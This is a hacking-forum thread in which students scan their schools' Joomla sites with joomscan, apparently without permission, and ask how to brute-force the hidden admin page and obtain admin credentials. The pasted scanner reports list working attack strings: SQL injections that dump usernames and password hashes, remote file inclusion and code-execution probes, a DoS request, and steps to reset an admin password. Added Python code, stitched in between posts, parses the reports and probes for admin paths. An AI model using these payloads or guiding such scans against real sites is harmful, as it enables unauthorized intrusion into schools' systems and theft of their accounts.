Trying joomscan.pl
#1
Question 
Hmmm, nothing to do this afternoon...
so I tried pentesting my school's website....
hmmm, if this is wrong, just delete the thread...
I wasn't sure where to post it....
What I want to ask is,
"The result is always: N/A"
does that mean the website is secure?
Also, about finding the admin page: its directory has been renamed... how do I brute-force it? Using what?
Here are the results......

Vulnerability Entries: 466
Last update: August 18, 2009

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan


Target: sanurbsd-***.sch.id

Server: Apache/2.2.14 (Ubuntu)


## NOTE: The Administrator URL was renamed. Bruteforce it. ##
## None of /administrator, /admin, /manage ##


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] .htaccess shipped with Joomla! is being deployed for SEO purpose
[!] It contains some defensive mod_rewrite rules
[!] Payloads that contain strings (mosConfig,base64_encode,<script>
GLOBALS,_REQUEST) wil be responsed with 403.


## Fingerprinting in progress ...

~Unable to detect the version. Is it sure a Joomla?

## Fingerprinting done.




Vulnerabilities Discovered
==========================

# 1
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? N/A

# 2
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? N/A

# 3
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? N/A

# 4
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? N/A

# 5
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? N/A

# 6
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? N/A

# 7
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? N/A

There is a vulnerable point in 7 found entries!

~[*] Time Taken: 11 sec
~[*] Send bugs, suggestions, contributions to [email protected]

The white one, the one who should be taking action and is talented!
Linuxtivist blog
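On the question of what "N/A" means in the report above: joomscan's core checks use pseudo-paths like `/?1.5.9-x`, i.e. they are decided by comparing the fingerprinted Joomla version against the affected range, and this run printed "Unable to detect the version" before every core entry came back N/A. Reading N/A as "not checked" rather than "not vulnerable" is the conservative interpretation. The following is an added example, not code from the thread or from joomscan, that parses the report format joomscan prints and separates confirmed findings from checks the scanner could not decide. The sample report is a constructed excerpt modelled on the output quoted above.

```python
"""Parse a joomscan report and sort its entries by verdict.

Added example, not part of the original post or of joomscan itself. It reads
the "# n / Info -> ... / Vulnerable? ..." blocks joomscan prints and groups
them into confirmed (Yes), cleared (No) and undecided (N/A) checks.
"""
import re
from collections import defaultdict

# Constructed sample modelled on the thread's output: two version-based core
# checks that came back N/A after fingerprinting failed, one generic check
# that fired, and one component check that did not.
SAMPLE_REPORT = """\
## Fingerprinting in progress ...

~Unable to detect the version. Is it sure a Joomla?

## Fingerprinting done.

Vulnerabilities Discovered
==========================

# 1
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application.
Vulnerable? N/A

# 2
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? N/A

# 3
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected.
Vulnerable? Yes

# 4
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

There is a vulnerable point in 4 found entries!
"""

# joomscan is inconsistent about "Versions Affected" / "Versions effected" /
# "Version Affected", so the regex accepts all three spellings.
ENTRY_RE = re.compile(
    r"^# (?P<num>\d+)\n"
    r"Info -> (?P<info>.+)\n"
    r"Versions? (?:Affected|effected): (?P<versions>.+)\n"
    r"Check: (?P<check>.+)\n"
    r"Exploit: (?P<exploit>.+)\n"
    r"Vulnerable\? (?P<verdict>Yes|No|N/A)$",
    re.MULTILINE,
)


def parse_report(text):
    """Return one dict per '# n' entry in a joomscan report."""
    return [m.groupdict() for m in ENTRY_RE.finditer(text)]


def version_detected(text):
    """False when joomscan printed its 'Unable to detect the version' line."""
    return "Unable to detect the version" not in text


def is_version_check(entry):
    """Pseudo-paths such as /?1.5.9-x are not real URLs: the entry is decided
    from the fingerprinted version, not from a request (interpretation)."""
    return entry["check"].startswith("/?")


def summarize(text):
    """Group entries by verdict; N/A entries are reported as 'not_checked'."""
    by_verdict = defaultdict(list)
    for entry in parse_report(text):
        by_verdict[entry["verdict"]].append(entry)
    return {
        "yes": [e["info"] for e in by_verdict["Yes"]],
        "no": [e["info"] for e in by_verdict["No"]],
        "not_checked": [e["info"] for e in by_verdict["N/A"]],
        "undecided_version_checks": sum(
            1 for e in by_verdict["N/A"] if is_version_check(e)),
        "version_detected": version_detected(text),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_REPORT).items():
        print(f"{key}: {value}")
```

When `version_detected` is False and every core entry sits in `not_checked`, the report says nothing about those issues either way; a second fingerprinting attempt (or a manual look at the language `.ini` files joomscan uses, as the second report in this thread shows) is needed before calling the site patched.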

#2
That means it has all been patched then.. now pay attention to the lines in that tool's opening banner

Use svn co to update the scanner
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan

so, have you updated it yet? .. because the target site could be running the newest Joomla, which does not yet have any vulns in that Joomla scanner tool's database
FOLLOW @DutaLinux
for more questions and sharing about security and open source only

#3
hehehe not yet, sir
I'll update it later when I'm on BackTrack...
I'm on "wedus" (Windows) right now

#4
UPDATED.....

When I ran ./joomscan.pl update

Error...

then I went to https://joomscan.svn.sourceforge.net/svn...can/trunk/
joomscan's website...

https://joomscan.svn.sourceforge.net/svn...b-info.txt <-- release date...

still the same as what is installed on my BT...
what's up with that?

is there another way to scan Joomla?

#5
As for me, I don't play with that kind of thing anymore.. just look on exploit sites like dis9.com.. and then do it manually

#6
(06-19-2011, 02:22 AM)zee eichel Wrote: As for me, I don't play with that kind of thing anymore.. just look on exploit sites like dis9.com.. and then do it manually

heh, promotion...
hahaha
but I want to learn using the BackTrack tools, sir...
I want to learn Metasploit... but it seems complicated.. hahaha

#7
I want to ask too
I also scanned my school's site and found this
Server: nginx admin
X-Powered-By: PHP/5.2.17


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] No known firewall detected!


## Fingerprinting in progress ...

~Generic version family ....... [1.5.x]

~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]

* Deduced version range is : [1.5.12 - 1.5.14]

## Fingerprinting done.




Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTI...ROTECT.pdf
Vulnerable? Yes

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? No

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? No

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? No

# 6
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.11 <=
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No

# 7
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 8
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? No

# 9
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? No

# 10
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? No

# 11
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? No

# 12
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? No

# 13
Info -> Core: joomla.php Remote File Inclusion Vulnerability
Versions effected: 1.0.0
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No

# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? Yes

# 15
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 16
Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/editors/xstandard/attachmentlibrary.php
Vulnerable? No

# 17
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? No

# 18
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

# 19
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Versions Affected: 1.5.5 <=
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write into field "token" char ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password
Vulnerable? No

# 20
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 21
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 22
Info -> CoreComponent: com_admin File Inclusion Vulnerability
Versions Affected: N/A
Check: /administrator/components/com_admin/admin.admin.html.php
Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
Vulnerable? No

# 23
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 24
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 25
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? No

# 26
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? No

# 27
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? No

# 28
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive
Vulnerable? No

# 29
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? No

# 30
Info -> CoreComponent: com_installer CSRF Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /administrator/components/com_installer/
Exploit: N/A
Vulnerable? No

# 31
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 32
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
Versions effected: 1.0.7 <=
Check: /components/com_poll/
Exploit: Send request /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Vulnerable? No

# 33
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? No

# 34
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes

# 35
Info -> Component: EasyBook SQL Injection Vulnerability
Version Affected: 1.1<=
Check: /components/com_easybook/
Exploit: /index.php?option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 36
Info -> Component: com_k2 (sectionid) SQL Injection Vulnerability
Versions effected: 1.0.1 Beta <=
Check: /components/com_k2/
Exploit: /index.php?option=com_k2&view=itemlist&category=null'+and+1=2+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 37
Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability
Version Affected: 2.6 <=
Check: /administrator/components/
Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Vulnerable? No

# 38
Info -> Component: Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability
Versions Affected: v2.7.3
Check: /index.php?option=com_phocagallery&view=categories&Itemid=
Exploit: /index.php?option=com_phocagallery&view=categories&Itemid=
Vulnerable? No

# 39
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No

There are 5 vulnerable points in 39 found entries!

~[*] Time Taken: 36 min and 56 sec
~[*] Send bugs, suggestions, contributions to [email protected]
root@bt:/pentest/web/scanners/joomscan#


above there is a vuln on /administrator
what's the next step?
I'm confused about what to do next
<< back|track'ers newbee
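The two "Generic" findings in the report above (`/htaccess.txt` still served, `/administrator/` reachable) and the "Administrator URL was renamed. Bruteforce it." note from the first post are the same kind of check: request a path, look at the status code and the body. The following is an added example, not from this thread or from joomscan, that replays those checks with an injectable fetch function so it runs offline against constructed responses. The candidate admin paths, the fake site (which renamed its backend to `/backoffice/`) and the `option=com_login` marker used to recognise the Joomla login form are assumptions for the example; for a live run, `http_fetch` builds a real fetcher and a proper wordlist replaces the short candidate list.

```python
"""Replay joomscan's generic checks and the admin-path search it asks for.

Added example, not from the original thread or from joomscan. fetch(path)
returns (status, body); a fake fetcher is used here so the code runs offline.
"""
from urllib.parse import urljoin

# Constructed responses: backend renamed to /backoffice/, stock htaccess.txt
# still in the web root, default admin paths gone.
FAKE_SITE = {
    "/htaccess.txt": (200, "## Joomla! default .htaccess\nRewriteEngine On\n"),
    "/backoffice/": (200, '<form action="/backoffice/index.php" method="post">'
                          '<input type="hidden" name="option" value="com_login" />'),
}


def fake_fetch(path):
    """Stand-in for an HTTP GET against the constructed site."""
    return FAKE_SITE.get(path, (404, "Not Found"))


def http_fetch(base_url, timeout=5):
    """Build a real fetch(path) -> (status, body) over urllib for a live target."""
    import urllib.error
    import urllib.request

    def fetch(path):
        req = urllib.request.Request(urljoin(base_url, path),
                                     headers={"User-Agent": "Mozilla/5.0"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.code, err.read().decode("utf-8", "replace")
    return fetch


# Assumed short wordlist; joomscan itself only tries the first three.
ADMIN_CANDIDATES = ["/administrator/", "/admin/", "/manage/",
                    "/backoffice/", "/panel/", "/cp/"]


def looks_like_joomla_login(body):
    """The Joomla 1.5 backend login form posts option=com_login; that string
    is the marker used here (assumption, but it matches the stock form)."""
    return "com_login" in body


def find_admin_path(fetch, candidates=ADMIN_CANDIDATES):
    """First candidate that answers 200 with a Joomla login form, else None.
    A 200 alone is not enough: catch-all pages would give false positives."""
    for path in candidates:
        status, body = fetch(path)
        if status == 200 and looks_like_joomla_login(body):
            return path
    return None


def htaccess_txt_exposed(fetch):
    """joomscan's generic check: the shipped htaccess.txt still in place means
    its mod_rewrite rules were never activated (it was not renamed to .htaccess)."""
    status, body = fetch("/htaccess.txt")
    return status == 200 and "RewriteEngine" in body


def run_generic_checks(fetch):
    """Return the same two generic verdicts joomscan prints, plus the admin path."""
    admin = find_admin_path(fetch)
    return {
        "admin_path": admin,
        "default_admin_exposed": admin == "/administrator/",
        "htaccess_txt_exposed": htaccess_txt_exposed(fetch),
    }


if __name__ == "__main__":
    print(run_generic_checks(fake_fetch))
```

Renaming the backend directory only hides the login form from the three paths joomscan tries; it does not protect the accounts behind it, so a found path still needs the usual controls (IP restriction or an extra authentication layer on the admin directory, and activating the shipped `.htaccess`).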

#8
(06-19-2011, 04:06 AM)THJC Wrote:
(06-19-2011, 02:22 AM)zee eichel Wrote: As for me, I don't play with that kind of thing anymore.. just look on exploit sites like dis9.com.. and then do it manually

heh, promotion...
hahaha
but I want to learn using the BackTrack tools, sir...
I want to learn Metasploit... but it seems complicated.. hahaha

well, this is the continuation of my discussion
sniff sniff
there's a frog, teroret teroret, by the river, teroret teroret, looking for food, teroret teroret, every morning, teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#9
(03-16-2012, 02:05 AM)wine trochanter Wrote: well, this is the continuation of my discussion
sniff sniff
let me ask then
if the vuln is in /administrator/, what do we use to get the username and password??

#10
whoa, a vuln in /administrator/? what vuln is that?
